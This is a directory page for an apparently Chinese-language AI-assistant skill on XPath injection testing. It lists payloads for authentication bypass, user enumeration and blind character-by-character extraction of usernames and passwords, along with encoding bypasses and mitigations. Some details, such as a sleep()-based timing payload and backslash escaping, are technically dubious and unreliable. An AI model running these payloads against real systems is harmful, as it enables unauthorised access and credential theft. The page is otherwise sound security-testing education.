MCP.directory

xpath-injection-testing

by Ed1s0nZ
0
0
Source

XPath注入漏洞测试的专业技能和方法论

Install

mkdir -p .claude/skills/xpath-injection-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/6523" && unzip -o skill.zip -d .claude/skills/xpath-injection-testing && rm skill.zip

Installs to .claude/skills/xpath-injection-testing

About this skill

XPath注入漏洞测试

概述

XPath注入是一种类似于SQL注入的漏洞,利用XPath查询语句的构造缺陷,可能导致信息泄露、认证绕过等。本技能提供XPath注入的检测、利用和防护方法。

漏洞原理

应用程序将用户输入直接拼接到XPath查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。

危险代码示例:

String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);

XPath基础

查询语法

基础查询:

//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']

函数

常用函数:

  • text() - 获取文本内容
  • count() - 计数
  • substring() - 子字符串
  • string-length() - 字符串长度
  • contains() - 包含检查

测试方法

1. 识别XPath输入点

常见功能:

  • 用户登录
  • 数据搜索
  • XML数据查询
  • 配置查询

2. 基础检测

测试特殊字符:

' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1

测试逻辑操作符:

' or '1'='1
' and '1'='2
' or 1=1 or '

3. 认证绕过

基础绕过:

用户名: admin' or '1'='1
密码: anything
查询: //user[username='admin' or '1'='1' and password='anything']

更精确的绕过:

用户名: admin') or ('1'='1
查询: //user[username='admin') or ('1'='1' and password='*']

4. 信息泄露

枚举用户:

' or 1=1 or '
' or '1'='1
') or 1=1 or ('

获取节点数量:

' or count(//user)>0 or '

获取特定节点:

' or substring(//user[1]/username,1,1)='a' or '

利用技术

认证绕过

方法1:逻辑绕过

输入: admin' or '1'='1
查询: //user[username='admin' or '1'='1' and password='*']
结果: 匹配所有用户

方法2:注释绕过

输入: admin')] | //* | //*[('
查询: //user[username='admin')] | //* | //*[('' and password='*']

方法3:布尔盲注

' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '

信息泄露

枚举所有用户:

' or 1=1 or '
结果: 返回所有用户节点

获取用户名:

' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
逐步获取每个字符

获取密码:

' or substring(//user[1]/password,1,1)='p' or '
逐步获取密码字符

盲注技术

基于时间的盲注:

' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '

基于布尔值的盲注:

' or substring(//user[1]/username,1,1)='a' or '
观察响应差异

绕过技术

编码绕过

URL编码:

' or '1'='1 → %27%20or%20%271%27%3D%271

HTML实体编码:

' → '
" → "
< → &lt;
> → &gt;

注释绕过

使用注释:

' or 1=1 or '
' or '1'='1' or '

函数绕过

使用不同函数:

substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]

工具使用

XPath表达式测试

在线工具:

  • XPath Tester
  • XMLSpy
  • Oxygen XML Editor

Burp Suite

  1. 拦截XPath查询请求
  2. 修改查询参数
  3. 观察响应结果

Python脚本

from lxml import etree
from lxml.etree import XPath

# 加载XML文档
doc = etree.parse('users.xml')

# 测试注入
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)

验证和报告

验证步骤

  1. 确认可以控制XPath查询
  2. 验证认证绕过或信息泄露
  3. 评估影响(未授权访问、数据泄露等)
  4. 记录完整的POC

报告要点

  • 漏洞位置和输入参数
  • XPath查询构造方式
  • 完整的利用步骤和PoC
  • 修复建议(输入验证、参数化查询等)

防护措施

推荐方案

  1. 输入验证

    private static final String[] XPATH_ESCAPE_CHARS = 
    {"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};

public static String escapeXPath(String input) {
    if (input == null) {
      return null;
    }
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < input.length(); i++) {
      char c = input.charAt(i);
      if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {
        sb.append("\\");
      }
      sb.append(c);
    }
    return sb.toString();
}

  2. 参数化查询

    // 使用XPath变量
String xpath = "//user[username=$username and password=$password]";
XPathExpression expr = xpath.compile(xpath);
XPathVariableResolver resolver = new MapVariableResolver(
    Map.of("username", escapedUsername, "password", escapedPassword));
expr.setXPathVariableResolver(resolver);

  3. 白名单验证

    // 只允许特定字符
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
    throw new IllegalArgumentException("Invalid input");
}

  4. 使用预编译查询

    // 预定义查询模板
private static final String LOGIN_QUERY = 
    "//user[username=$1 and password=$2]";

// 使用参数绑定

  5. 最小权限

    • 限制XPath查询范围
    • 使用访问控制
    • 限制可查询的节点

注意事项

  • 仅在授权测试环境中进行
  • 注意不同XPath版本的语法差异
  • 测试时避免对XML数据造成影响
  • 了解目标应用的XPath实现

More by Ed1s0nZ

View all skills by Ed1s0nZ

csrf-testing

Ed1s0nZ

CSRF跨站请求伪造测试的专业技能和方法论

00

file-upload-testing

Ed1s0nZ

文件上传漏洞测试的专业技能和方法论

10

cloud-security-audit

Ed1s0nZ

云安全审计的专业技能和方法论

10

xss-testing

Ed1s0nZ

XSS跨站脚本攻击测试的专业技能

20

api-security-testing

Ed1s0nZ

API安全测试的专业技能和方法论

30

deserialization-testing

Ed1s0nZ

反序列化漏洞测试的专业技能和方法论

60

You might also like

flutter-development

aj-geddes

Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.

643969

drawio-diagrams-enhanced

jgtolentino

Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.

591705

ui-ux-pro-max

nextlevelbuilder

"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."

318398

godot

bfollington

This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.

339397

nano-banana-pro

garg-aayush

Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.

451339

fastapi-templates

wshobson

Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.

304231

Related MCP Servers

Browse all servers
XPathXPath

XPath enables Claude to execute xpath queries on XML and HTML, supporting web scraping for structured data extraction wi

2 tools

Stay ahead of the MCP ecosystem

Get weekly updates on new skills and servers.